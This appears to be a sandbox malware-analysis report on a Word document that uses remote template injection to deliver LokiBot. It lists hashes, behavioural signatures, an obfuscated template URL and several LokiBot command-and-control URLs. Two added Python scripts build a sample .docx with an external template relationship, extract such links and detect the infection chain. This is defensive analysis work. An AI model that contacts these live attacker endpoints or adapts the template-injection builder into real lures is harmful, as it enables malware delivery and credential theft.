General
Target: e270a30a-6fe8-4c9a-b9ab-5e70157ffa13.docx
Size: 10KB
Sample: 230310-xe59vaeh59
MD5: d0a30c0613166d9eff01470fd074f7fc
SHA1: 54832f5e30a4588211a212fc55d14dc9b23a656c
SHA256: ba45bd57955b02375e7aaf23a00a02343506d3b1789a1e33dd51c20ff4b083e9
SHA512: d088ff01822976d6de61d9d801fb9eecb56d27b842f54023213b051d05ebe8dd267082e36baf3bbf4105accc5bc5a892f3140225cd8dfaedac2b55412857d95c
SSDEEP: 192:ScIMmtP1aIG/bslPL++uOR4nl+CVWBXJC0c3Pp:SPXU/slT+LOR6HkZC9B
Static task: static1
Behavioral task: behavioral1
Sample: e270a30a-6fe8-4c9a-b9ab-5e70157ffa13.docx
Resource: win7-20230220-en
Behavioral task: behavioral2
Sample: e270a30a-6fe8-4c9a-b9ab-5e70157ffa13.docx
Resource: win10v2004-20230220-en
Malware Config
Extracted: http://yyyyyYYYYUUSUUUUUUU3243242UUU23U423U4UU2UWWWWW8W8W7W8WWWWWWW878W8W8WW78WWWW87W87W88WEEW787888W88W8W@1806685202/ru2........................doc
Extracted: lokibot
http://185.246.220.60/shen/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
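The "Abuses OpenXML format to download file from external location" signature further down describes a .docx whose relationship parts point at a resource outside the package (the same mechanism as remote template injection), and the first extracted URL above has the shape such a target often takes: a long run of junk before an `@` (the userinfo component, which a reader skims past) and a host written as a single decimal integer. The script below is an added example, not part of this report or of the sandbox's own extractor. It constructs a minimal .docx in memory with an external `attachedTemplate` relationship (constructed sample; the analysed file is not reproduced here), lists every `TargetMode="External"` relationship in any `.rels` part, and normalizes the host so it can be compared against an IP blocklist. Most HTTP client stacks accept a bare decimal host and treat it as a 32-bit IPv4 address; the expansion is plain arithmetic, and the example neither resolves the result nor claims what it hosted. The relationship type constant and the part names are the standard OPC/WordprocessingML ones.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

# First URL from the "Malware Config / Extracted" section of this page, used here only as sample input.
PAGE_TEMPLATE_URL = "http://yyyyyYYYYUUSUUUUUUU3243242UUU23U423U4UU2UWWWWW8W8W7W8WWWWWWW878W8W8WW78WWWW87W87W88WEEW787888W88W8W@1806685202/ru2........................doc"


def build_sample_docx(template_url):
    """Construct a minimal .docx (a zip of XML parts) whose settings part references an
    external attached template.  Constructed sample for the parser below; it is not the
    file analysed on this page."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                   '<Default Extension="xml" ContentType="application/xml"/></Types>')
        z.writestr("_rels/.rels",
                   f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                   'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" '
                   'Target="word/document.xml"/></Relationships>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   '<w:body><w:p/></w:body></w:document>')
        z.writestr("word/settings.xml",
                   '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                   'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                   '<w:attachedTemplate r:id="rId1"/></w:settings>')
        # The external relationship: Word fetches this Target when the document is opened.
        z.writestr("word/_rels/settings.xml.rels",
                   f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                   f'Type="{ATTACHED_TEMPLATE}" Target="{template_url}" TargetMode="External"/>'
                   '</Relationships>')
    return buf.getvalue()


def external_targets(docx_bytes):
    """Return (rels part, relationship-type suffix, target) for every relationship in any
    .rels part that carries TargetMode="External".  Internal relationships (the default)
    point inside the package and are not interesting here."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rtype, rel.get("Target", "")))
    return found


def normalize_host(url):
    """Discard the userinfo padding before '@' and, if the host is a single decimal
    integer, expand it to dotted-quad form (32-bit big-endian) so it can be matched
    against ordinary IP blocklists.  Pure arithmetic: no lookup is performed."""
    host = urlsplit(url).hostname or ""
    if host.isdigit() and int(host) < 2 ** 32:
        n = int(host)
        host = ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))
    return host


if __name__ == "__main__":
    for part, rtype, target in external_targets(build_sample_docx(PAGE_TEMPLATE_URL)):
        print(f"{part}: {rtype} -> {target}")
        print(f"  normalized host: {normalize_host(target)}")
```

Run the same `external_targets` over a real sample by reading its bytes instead of calling `build_sample_docx`; any `External` relationship in `settings.xml.rels`, `document.xml.rels` or a footnote/header part is worth pivoting on, and the normalized host is what to feed to the blocklist rather than the raw URL string.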
Targets
Target: e270a30a-6fe8-4c9a-b9ab-5e70157ffa13.docx
Score: 10/10
- Blocklisted process makes network request
- Downloads MZ/PE file
- Abuses OpenXML format to download file from external location
- Executes dropped EXE
- Loads dropped DLL
- Uses the VBS compiler for execution
- Accesses Microsoft Outlook profiles
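The signature list above is a behavioral summary, not a process tree; the chain an analyst would hunt for on an endpoint (Office application, then the .NET VBS compiler `vbc.exe`, then an executable launched from a user-writable directory, then a connection to a known LokiBot C2) is an assumption consistent with these signatures, not something the report states. The script below is an added example, not the sandbox's own detection logic. It runs three rules over constructed Sysmon-style process-creation and network events (field names, PIDs and paths are made up for the example); only the C2 host set is taken from the extracted lokibot config on this page.

```python
from dataclasses import dataclass

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# "Uses the VBS compiler for execution": vbc.exe (csc.exe is the C# twin of the same trick)
DOTNET_COMPILERS = {"vbc.exe", "csc.exe"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\programdata\\", "\\users\\public\\")

# C2 hosts from the extracted lokibot config on this page.
LOKIBOT_C2_HOSTS = {"185.246.220.60", "kbfvzoboss.bid", "alphastand.trade", "alphastand.win", "alphastand.top"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str


@dataclass(frozen=True)
class NetEvent:
    pid: int
    dest_host: str  # IP or name, as the sensor logged it
    dest_port: int


def image_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(pid, procs):
    """Walk ppid links upward; stops at an unknown pid or on a pid cycle (reused PIDs)."""
    seen = {pid}
    cur = procs.get(pid)
    while cur is not None and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = procs.get(cur.ppid)
        if cur is not None:
            yield cur


def detect(proc_events, net_events, c2_hosts=LOKIBOT_C2_HOSTS):
    """Return (rule, pid) alerts for the three behaviours in the signature list."""
    procs = {e.pid: e for e in proc_events}
    alerts = []
    for e in proc_events:
        office_ancestor = any(image_name(a.image) in OFFICE_IMAGES for a in ancestors(e.pid, procs))
        if office_ancestor and image_name(e.image) in DOTNET_COMPILERS:
            alerts.append(("office_spawns_dotnet_compiler", e.pid))
        if office_ancestor and any(d in e.image.lower() for d in USER_WRITABLE):
            alerts.append(("dropped_exe_executed_from_office", e.pid))
    for n in net_events:
        if n.dest_host.lower() in c2_hosts:
            alerts.append(("known_lokibot_c2_contact", n.pid))
    return alerts


# Constructed sample telemetry (hypothetical PIDs and paths).
SAMPLE_PROCS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe"),
    ProcEvent(4000, 1000, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"),
    ProcEvent(4100, 4000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"),
    ProcEvent(4200, 4100, r"C:\Users\Admin\AppData\Local\Temp\update.exe"),
    ProcEvent(5000, 1000, r"C:\Windows\System32\notepad.exe"),
]
SAMPLE_NET = [
    NetEvent(4200, "185.246.220.60", 80),
    NetEvent(5000, "93.184.216.34", 443),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_PROCS, SAMPLE_NET):
        print(f"{rule}: pid {pid}")
```

The ancestor walk (rather than a direct parent check) matters: the dropped executable's parent is `vbc.exe`, not Word, so a parent-only rule would miss it. Tune `USER_WRITABLE` and `OFFICE_IMAGES` to the estate; the C2 set is the only part tied to this specific sample.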